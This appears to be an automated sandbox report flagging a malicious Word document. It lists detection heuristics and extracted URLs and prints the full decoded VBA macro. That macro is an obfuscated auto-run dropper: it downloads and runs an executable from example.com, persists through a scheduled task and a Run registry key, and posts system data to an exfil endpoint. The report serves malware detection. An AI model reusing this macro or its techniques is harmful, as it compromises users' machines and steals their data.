MALICIOUS
250
Risk Score
Heuristics 7
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Dim shell As Object -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
stream.Write xmlHttp.ResponseBody -
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
Dim shell As Object -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set xmlHttp = CreateObject("M" & "SXML2.X" & "MLHT" & "TP") -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://uithcm-# Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.microsoft.com/office/2019/extlstReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2023/wordml/word16duReferenced by macro
- http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashReferenced by macro
- http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlockReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
- https://uithcm-my.sharepoint.com/personal/23520498_ms_uit_edu_vn/Documents/Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2277 bytes |
SHA-256: 46bef19bcf2884492c70f723352da51ed009bb0778b14e16b8711f0bad262b53 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim shell As Object
Dim xmlHttp As Object
Dim stream As Object
Dim taskName As String
Dim exePath As String
Dim registryPath As String
Dim keyName As String
Dim c2Server As String
Dim dataToSend As String
' Set variables
taskName = "U" & "pd" & "ateT" & "as" & "k"
exePath = "C" & ":\W" & "in" & "do" & "ws\T" & "em" & "p\u" & "pd" & "at" & "e.e" & "xe"
registryPath = "H" & "KEY_C" & "URREN" & "T_U" & "SER" & "ER\S" & "oftw" & "are\M" & "icr" & "oso" & "ft\W" & "ind" & "ows\C" & "urre" & "ntVe" & "rsi" & "on\R" & "un"
keyName = "U" & "pd" & "ate" & "r"
c2Server = "h" & "tt" & "p://" & "e" & "xa" & "mp" & "le.c" & "om/u" & "pd" & "at" & "e.e" & "xe"
dataToSend = "S" & "ys" & "te" & "mI" & "nf" & "o"
' Download executable payload
Set xmlHttp = CreateObject("M" & "SXML2.X" & "MLHT" & "TP")
xmlHttp.Open "G" & "ET", c2Server, False
xmlHttp.Send
If xmlHttp.Status = 200 Then
Set stream = CreateObject("A" & "DOB" & "D.S" & "t" & "ream")
stream.Type = 1 ' adTypeBinary
stream.Open
stream.Write xmlHttp.ResponseBody
stream.SaveToFile exePath, 2 ' adSaveCreateOverWrite
stream.Close
End If
' Execute the downloaded executable
Set shell = CreateObject("W" & "Sc" & "ript.S" & "hell")
shell.Run exePath, 0, True
' Create scheduled task
shell.Run "s" & "cht" & "asks /" & "cre" & "ate /" & "tn " & taskName & " /" & "tr " & exePath & " /" & "sc on" & "logon", 0, True
' Add registry key for persistence
shell.RegWrite registryPath & "\" & keyName & "\", exePath, "REG_S" & "Z"
' Exfiltrate data over HTTP
Set xmlHttp = CreateObject("M" & "SXML2.X" & "MLHT" & "TP")
xmlHttp.Open "P" & "OST", "h" & "tt" & "p://" & "e" & "xa" & "mp" & "le.c" & "om/e" & "xf" & "il", False
xmlHttp.Send dataToSend
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 11264 bytes |
SHA-256: f6e175b1d30350277ee9e5a1bfc09fef3a66df0d4b959aeee9a6bc92e40d7612 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.